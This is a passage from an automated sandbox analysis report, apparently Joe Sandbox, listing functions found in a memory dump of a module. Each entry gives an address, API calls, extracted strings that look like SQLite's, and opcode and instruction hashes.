                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: , $index '%q'
                                                            • API String ID: 0-2319803734
                                                            • Opcode ID: 126a52fc2f49a8019279f1e4ff9669cba81622c80d1771703e51c764dd2e6b28
                                                            • Instruction ID: 66ffdb4486d4459d52414f663e57d4365589bdafb373de97c80f91661b16ffd6
                                                            • Opcode Fuzzy Hash: 126a52fc2f49a8019279f1e4ff9669cba81622c80d1771703e51c764dd2e6b28
                                                            • Instruction Fuzzy Hash: D061DFB2F09651D9EB228B79D8806BC37B0BB84B58F105A76DE2E57BA4DB38D541C310
                                                            Function 00007FFBA45DA069 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: out of memory$string or blob too big
                                                            • API String ID: 3510742995-2410398255
                                                            • Opcode ID: c2983c0312150d2ef1914f635f908dc9fe0b50588203d18aaddd05a0d508168d
                                                            • Instruction ID: 6e24f4ac26522f0b4912433c1c4548bd8032df09ded75db6a5102c92c4844cf9
                                                            • Opcode Fuzzy Hash: c2983c0312150d2ef1914f635f908dc9fe0b50588203d18aaddd05a0d508168d
                                                            • Instruction Fuzzy Hash: EE6194A6A09692C2E725CB66E48027FAB60FF45B88F114032EF5D17BA5DF3DE4019700
                                                            Function 00007FFBA45A7EA7 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: (join-%u)$(subquery-%u)
                                                            • API String ID: 3510742995-2916047017
                                                            • Opcode ID: b572a0fa5a0dedae3d4483a93f2ab5b3c81c614ff75c1aac6b3644a679e72f9e
                                                            • Instruction ID: 1e5865c5427e1ba18205a3de1bcf2acdd10f694d83363c38987e2795427e5371
                                                            • Opcode Fuzzy Hash: b572a0fa5a0dedae3d4483a93f2ab5b3c81c614ff75c1aac6b3644a679e72f9e
                                                            • Instruction Fuzzy Hash: 9F61F2B2B09A89C5EB669B35D0887BA77A4FF547A4F440632DE6D032E4DF2CE549C700
                                                            Function 00007FFBA45B9350 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            • Opcode ID: fb52b09e8364bf0ada7bd191378c04c85d065df1704cb7ea57a37cf645860cf8
                                                            • Instruction ID: c3d26c0c53b8d04f8b9c99db5adb29824f43ee1278357b8867d58ab1c76819d3
                                                            • Opcode Fuzzy Hash: fb52b09e8364bf0ada7bd191378c04c85d065df1704cb7ea57a37cf645860cf8
                                                            • Instruction Fuzzy Hash: 79517DA270AB82D6EB55CB35E5847A977A4FB48B84F144036DF4D437A4EF78E856C300
                                                            Function 00007FFBA45C7160 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 7538d4a32e78d7b82e4a066d75ee7b8eb98c04bf8a5ec41b251e910ead9ae2bb
                                                            • Instruction ID: 7fe5657edab94ea6ad75b39c902b294cbfa185a51091e5f4aad046f375b2ea23
                                                            • Opcode Fuzzy Hash: 7538d4a32e78d7b82e4a066d75ee7b8eb98c04bf8a5ec41b251e910ead9ae2bb
                                                            • Instruction Fuzzy Hash: 36514CB6A09B81C6DA618F69E4802AEB7A5FB94B84F544022EE8D53B65CF3CD155C700
                                                            Function 00007FFBA45CDEF0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $%!.15g$-
                                                            • API String ID: 3510742995-875264902
                                                            • Opcode ID: 22eace8686233fb0eb45fca84ad33bd80246756f6db5a34c8033fa0f618aca54
                                                            • Instruction ID: 4171b5fb8278746354add8dac0131dd7fea0231745d112ba47a87cd9e280e720
                                                            • Opcode Fuzzy Hash: 22eace8686233fb0eb45fca84ad33bd80246756f6db5a34c8033fa0f618aca54
                                                            • Instruction Fuzzy Hash: C441F3A2A1A785C2EB52CB3EE4817AA7BA0FB457C0F001125EE8D577A5CB3DD515CB40
                                                            Function 00007FFBA45BB150 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            • Opcode ID: 0bcbc6cae7b0fc790100d7018d2cdd6e1a0a6b1edafb480a8fefcad7baf3468c
                                                            • Instruction ID: f67fa137962c4fb671c72f4c11d7179c1447b3953941a4f7e5aa12b75c884580
                                                            • Opcode Fuzzy Hash: 0bcbc6cae7b0fc790100d7018d2cdd6e1a0a6b1edafb480a8fefcad7baf3468c
                                                            • Instruction Fuzzy Hash: 4841C6B2A19B45C2E7618F25E48067D73A5FB84B80F541135EE8E57BA4EFBCE802C740
                                                            Function 00007FFBA45C67D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 0-3764764234
                                                            • Opcode ID: 8e7099f1d75ea6592a85f3cb543f82d8980480ba14f82e68bdb99dda0867fc29
                                                            • Instruction ID: f0cca7d0d12a4bcee6d1d3d54c1423fc2c0f772f6cd4045df0d4e321a8407fb7
                                                            • Opcode Fuzzy Hash: 8e7099f1d75ea6592a85f3cb543f82d8980480ba14f82e68bdb99dda0867fc29
                                                            • Instruction Fuzzy Hash: 8C31D2B2A0A7C1CED706CF3AD49007D7BA1EB41B44B04813AEF894B369DA3CD655C760
                                                            Function 00007FFBA46CD31C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: 4225f539f8f56d5046f9c6d2744c41963acbcc3cb5ac73efd21cbd844694e532
                                                            • Instruction ID: 2f8f02ff98cf84e8a37e8fdad740b11975d7675e265932f7fc1adb808f9a7f16
                                                            • Opcode Fuzzy Hash: 4225f539f8f56d5046f9c6d2744c41963acbcc3cb5ac73efd21cbd844694e532
                                                            • Instruction Fuzzy Hash: FA113662B15B01CAEB00CF74EC942A933A4FB19B58F042E31DE6D46BA4DF38D1A88340
                                                            Function 00007FFBA45A50B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _msizerealloc
                                                            • String ID: failed memory resize %u to %u bytes
                                                            • API String ID: 2713192863-2134078882
                                                            • Opcode ID: 92894b7a421d4a8d0f2dc1f799139c1eca998cb75613eb0b3fdb44dfe30869b9
                                                            • Instruction ID: 8ae6d96437e58ac24fde928f4d887da85700b21ebeaeef2d52cc2d72d533a17d
                                                            • Opcode Fuzzy Hash: 92894b7a421d4a8d0f2dc1f799139c1eca998cb75613eb0b3fdb44dfe30869b9
                                                            • Instruction Fuzzy Hash: 7AE065A5B0A781C1FA558B2AF9C447A6761BF48FC4B045571EE0E07B29EF2CE545C700
                                                            Function 00007FFBA45EB370 Relevance: 5.2, APIs: 4, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 1733ba5a598d342cab86c35d598db557edc5f0d7135ddbcc6d673e800d325bcc
                                                            • Instruction ID: 6f57a80ea7e644127bedfced4d92fd0d6ab605b4f3df1b7671b63e58e2f14672
                                                            • Opcode Fuzzy Hash: 1733ba5a598d342cab86c35d598db557edc5f0d7135ddbcc6d673e800d325bcc
                                                            • Instruction Fuzzy Hash: FB91ACB1A0A746C6EA56CF26D2C562A67A0FF44B92F585235EF5D07BE1DE3CE4108700